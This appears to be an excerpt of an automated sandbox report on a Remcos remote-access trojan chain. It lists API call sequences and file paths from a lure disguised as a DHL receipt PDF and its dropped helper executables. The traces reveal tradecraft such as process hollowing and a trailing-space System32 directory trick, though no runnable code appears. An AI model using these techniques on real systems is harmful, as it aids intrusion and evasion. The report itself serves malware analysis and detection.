Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_028FC898 NtOpenFile,NtReadFile, 5_2_028FC898
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_028FD9A4 NtQueryInformationProcess, 5_2_028FD9A4
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_028F7944 NtAllocateVirtualMemory, 5_2_028F7944
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_028F7A92 NtWriteVirtualMemory, 5_2_028F7A92
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_028F7942 NtAllocateVirtualMemory, 5_2_028F7942
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5BD58F NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA, 5_2_2D5BD58F
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5B80EF CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError, 5_2_2D5B80EF
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5BBB09 OpenProcess,NtSuspendProcess,CloseHandle, 5_2_2D5BBB09
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5BBB35 OpenProcess,NtResumeProcess,CloseHandle, 5_2_2D5BBB35
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5B32D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile, 5_2_2D5B32D2
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C89E4 NtQueryInformationToken,NtQueryInformationToken, 7_2_00007FF7689C89E4
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689E1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 7_2_00007FF7689E1538
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess, 7_2_00007FF7689B3D94
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C898C NtQueryInformationToken, 7_2_00007FF7689C898C
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError, 7_2_00007FF7689C7FF8
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose, 7_2_00007FF7689C88C0
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 7_2_00007FF7689C8114
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689DBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 7_2_00007FF7689DBCF0
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C89E4 NtQueryInformationToken,NtQueryInformationToken, 8_2_00007FF7689C89E4
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689E1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 8_2_00007FF7689E1538
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess, 8_2_00007FF7689B3D94
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C898C NtQueryInformationToken, 8_2_00007FF7689C898C
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError, 8_2_00007FF7689C7FF8
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose, 8_2_00007FF7689C88C0
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 8_2_00007FF7689C8114
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689DBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 8_2_00007FF7689DBCF0
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C89E4 NtQueryInformationToken,NtQueryInformationToken, 11_2_00007FF7689C89E4
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689E1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 11_2_00007FF7689E1538
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess, 11_2_00007FF7689B3D94
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C898C NtQueryInformationToken, 11_2_00007FF7689C898C
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError, 11_2_00007FF7689C7FF8
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose, 11_2_00007FF7689C88C0
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 11_2_00007FF7689C8114
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689DBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 11_2_00007FF7689DBCF0
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF319890 NtSetInformationKey,NtQueryKey,RegQueryInfoKeyW,lstrlenW,memset,RegEnumKeyExW,RegOpenKeyExW,RegCloseKey, 19_2_00007FF6DF319890
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 20_2_0040DD85
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00401806 NtdllDefWindowProc_W, 20_2_00401806
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_004018C0 NtdllDefWindowProc_W, 20_2_004018C0
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B5240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z, 7_2_00007FF7689B5240
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B81B8 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 0_2_028B81B8
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA567B4 ExitWindowsEx,LoadLibraryA,GetProcAddress, 0_2_2DA567B4
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5B67B9 ExitWindowsEx,LoadLibraryA,GetProcAddress, 5_2_2D5B67B9
Source: C:\Users\Public\alpha.exe File created: C:\Windows
Source: C:\Users\Public\alpha.exe File created: C:\Windows \System32
Source: C:\Windows\System32\extrac32.exe File created: C:\Windows \System32\per.exe
Source: C:\Users\Public\alpha.exe File deleted: C:\Windows \System32
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A20C4 0_2_028A20C4
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA77D33 0_2_2DA77D33
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA76FEA 0_2_2DA76FEA
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA53FCA 0_2_2DA53FCA
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA7DE9D 0_2_2DA7DE9D
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA66E0E 0_2_2DA66E0E
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA75E5E 0_2_2DA75E5E
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA8D9C9 0_2_2DA8D9C9
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA73946 0_2_2DA73946
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA778FE 0_2_2DA778FE
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA67BAF 0_2_2DA67BAF
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA5DB62 0_2_2DA5DB62
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA67A46 0_2_2DA67A46
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA7E558 0_2_2DA7E558
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA774E6 0_2_2DA774E6
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA78770 0_2_2DA78770
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA861F0 0_2_2DA861F0
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA78168 0_2_2DA78168
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA94159 0_2_2DA94159
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA5F0FA 0_2_2DA5F0FA
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA7E0CC 0_2_2DA7E0CC
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA6739D 0_2_2DA6739D
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA9332B 0_2_2DA9332B
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA7E2FB 0_2_2DA7E2FB
Source: C:\Users\Public\Libraries\yfkwifxL.pif Code function: 1_2_0040E800 1_2_0040E800
Source: C:\Users\Public\Libraries\yfkwifxL.pif Code function: 1_2_0040C838 1_2_0040C838
Source: C:\Users\Public\Libraries\yfkwifxL.pif Code function: 1_2_0040F1CA 1_2_0040F1CA
Source: C:\Users\Public\Libraries\yfkwifxL.pif Code function: 1_2_00411250 1_2_00411250
Source: C:\Users\Public\Libraries\yfkwifxL.pif Code function: 1_2_004102D0 1_2_004102D0
Source: C:\Users\Public\Libraries\yfkwifxL.pif Code function: 1_2_0040B2E7 1_2_0040B2E7
Source: C:\Users\Public\Libraries\yfkwifxL.pif Code function: 1_2_004102F0 1_2_004102F0
Source: C:\Users\Public\Libraries\yfkwifxL.pif Code function: 1_2_004105F0 1_2_004105F0
Source: C:\Users\Public\Libraries\yfkwifxL.pif Code function: 1_2_00410673 1_2_00410673
Source: C:\Users\Public\Libraries\yfkwifxL.pif Code function: 1_2_004106B9 1_2_004106B9
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_45BD7194 5_2_45BD7194
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_45BCB5C1 5_2_45BCB5C1
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_028E20C4 5_2_028E20C4
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5BDB62 5_2_2D5BDB62
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5DE558 5_2_2D5DE558
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5D74E6 5_2_2D5D74E6
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5D6FEA 5_2_2D5D6FEA
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5D5E5E 5_2_2D5D5E5E
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5DDE9D 5_2_2D5DDE9D
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5D3946 5_2_2D5D3946
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5E61F0 5_2_2D5E61F0
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5DE0CC 5_2_2D5DE0CC
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5D78FE 5_2_2D5D78FE
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5F332B 5_2_2D5F332B
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5DE2FB 5_2_2D5DE2FB
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C5554 7_2_00007FF7689C5554
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B7D30 7_2_00007FF7689B7D30
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689BAA54 7_2_00007FF7689BAA54
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C37D8 7_2_00007FF7689C37D8
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689DD9D0 7_2_00007FF7689DD9D0
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B81D4 7_2_00007FF7689B81D4
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B8DF8 7_2_00007FF7689B8DF8
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689BCE10 7_2_00007FF7689BCE10
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689E1538 7_2_00007FF7689E1538
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689D7F00 7_2_00007FF7689D7F00
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B6EE4 7_2_00007FF7689B6EE4
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B5240 7_2_00007FF7689B5240
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689BD250 7_2_00007FF7689BD250
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B9E50 7_2_00007FF7689B9E50
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B7650 7_2_00007FF7689B7650
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B2220 7_2_00007FF7689B2220
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C4224 7_2_00007FF7689C4224
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B4A30 7_2_00007FF7689B4A30
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689DAA30 7_2_00007FF7689DAA30
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689BE680 7_2_00007FF7689BE680
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689DEE88 7_2_00007FF7689DEE88
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C0A6C 7_2_00007FF7689C0A6C
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689DAFBC 7_2_00007FF7689DAFBC
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B3410 7_2_00007FF7689B3410
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B6BE0 7_2_00007FF7689B6BE0
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B9B50 7_2_00007FF7689B9B50
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B372C 7_2_00007FF7689B372C
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B3F90 7_2_00007FF7689B3F90
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B5B70 7_2_00007FF7689B5B70
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C18D4 7_2_00007FF7689C18D4
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B8510 7_2_00007FF7689B8510
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689BB0D8 7_2_00007FF7689BB0D8
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C7854 7_2_00007FF7689C7854
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689DAC4C 7_2_00007FF7689DAC4C
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B2C48 7_2_00007FF7689B2C48
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B1884 7_2_00007FF7689B1884
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C5554 8_2_00007FF7689C5554
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B7D30 8_2_00007FF7689B7D30
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689BAA54 8_2_00007FF7689BAA54
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C37D8 8_2_00007FF7689C37D8
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689DD9D0 8_2_00007FF7689DD9D0
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B81D4 8_2_00007FF7689B81D4
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B8DF8 8_2_00007FF7689B8DF8
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689BCE10 8_2_00007FF7689BCE10
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689E1538 8_2_00007FF7689E1538
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689D7F00 8_2_00007FF7689D7F00
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B6EE4 8_2_00007FF7689B6EE4
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B5240 8_2_00007FF7689B5240
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689BD250 8_2_00007FF7689BD250
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B9E50 8_2_00007FF7689B9E50
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B7650 8_2_00007FF7689B7650
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B2220 8_2_00007FF7689B2220
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C4224 8_2_00007FF7689C4224
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B4A30 8_2_00007FF7689B4A30
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689DAA30 8_2_00007FF7689DAA30
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689BE680 8_2_00007FF7689BE680
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689DEE88 8_2_00007FF7689DEE88
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C0A6C 8_2_00007FF7689C0A6C
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689DAFBC 8_2_00007FF7689DAFBC
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B3410 8_2_00007FF7689B3410
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B6BE0 8_2_00007FF7689B6BE0
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B9B50 8_2_00007FF7689B9B50
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B372C 8_2_00007FF7689B372C
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B3F90 8_2_00007FF7689B3F90
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B5B70 8_2_00007FF7689B5B70
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C18D4 8_2_00007FF7689C18D4
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B8510 8_2_00007FF7689B8510
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689BB0D8 8_2_00007FF7689BB0D8
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C7854 8_2_00007FF7689C7854
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689DAC4C 8_2_00007FF7689DAC4C
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B2C48 8_2_00007FF7689B2C48
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B1884 8_2_00007FF7689B1884
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C5554 11_2_00007FF7689C5554
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689BAA54 11_2_00007FF7689BAA54
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C4224 11_2_00007FF7689C4224
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C0A6C 11_2_00007FF7689C0A6C
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C37D8 11_2_00007FF7689C37D8
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689DD9D0 11_2_00007FF7689DD9D0
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B81D4 11_2_00007FF7689B81D4
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B8DF8 11_2_00007FF7689B8DF8
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689BCE10 11_2_00007FF7689BCE10
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689E1538 11_2_00007FF7689E1538
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B7D30 11_2_00007FF7689B7D30
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689D7F00 11_2_00007FF7689D7F00
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B6EE4 11_2_00007FF7689B6EE4
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B5240 11_2_00007FF7689B5240
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689BD250 11_2_00007FF7689BD250
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B9E50 11_2_00007FF7689B9E50
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B7650 11_2_00007FF7689B7650
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B2220 11_2_00007FF7689B2220
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B4A30 11_2_00007FF7689B4A30
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689DAA30 11_2_00007FF7689DAA30
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689BE680 11_2_00007FF7689BE680
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689DEE88 11_2_00007FF7689DEE88
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689DAFBC 11_2_00007FF7689DAFBC
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B3410 11_2_00007FF7689B3410
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B6BE0 11_2_00007FF7689B6BE0
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B9B50 11_2_00007FF7689B9B50
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B372C 11_2_00007FF7689B372C
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B3F90 11_2_00007FF7689B3F90
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B5B70 11_2_00007FF7689B5B70
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C18D4 11_2_00007FF7689C18D4
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B8510 11_2_00007FF7689B8510
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689BB0D8 11_2_00007FF7689BB0D8
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C7854 11_2_00007FF7689C7854
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689DAC4C 11_2_00007FF7689DAC4C
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B2C48 11_2_00007FF7689B2C48
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B1884 11_2_00007FF7689B1884
Source: C:\Users\Public\xkn.exe Code function: 16_2_00007FFD9BAD10FA 16_2_00007FFD9BAD10FA
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF316054 19_2_00007FF6DF316054
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF311664 19_2_00007FF6DF311664
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF31596C 19_2_00007FF6DF31596C
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF317C7C 19_2_00007FF6DF317C7C
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF319890 19_2_00007FF6DF319890
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF3167A0 19_2_00007FF6DF3167A0
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF314050 19_2_00007FF6DF314050
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF317670 19_2_00007FF6DF317670
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF312D70 19_2_00007FF6DF312D70
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF319C74 19_2_00007FF6DF319C74
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF314318 19_2_00007FF6DF314318
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF315128 19_2_00007FF6DF315128
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF3172C0 19_2_00007FF6DF3172C0
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF316EC8 19_2_00007FF6DF316EC8
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF3183D8 19_2_00007FF6DF3183D8
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF316AE8 19_2_00007FF6DF316AE8
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0044B040 20_2_0044B040
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0043610D 20_2_0043610D
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00447310 20_2_00447310
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0044A490 20_2_0044A490
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0040755A 20_2_0040755A
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0043C560 20_2_0043C560
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0044B610 20_2_0044B610
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0044D6C0 20_2_0044D6C0
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_004476F0 20_2_004476F0
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0044B870 20_2_0044B870
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0044081D 20_2_0044081D
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00414957 20_2_00414957
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_004079EE 20_2_004079EE
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00407AEB 20_2_00407AEB
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0044AA80 20_2_0044AA80
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00412AA9 20_2_00412AA9
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00404B74 20_2_00404B74
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00404B03 20_2_00404B03
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0044BBD8 20_2_0044BBD8
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00404BE5 20_2_00404BE5
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00404C76 20_2_00404C76
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00415CFE 20_2_00415CFE
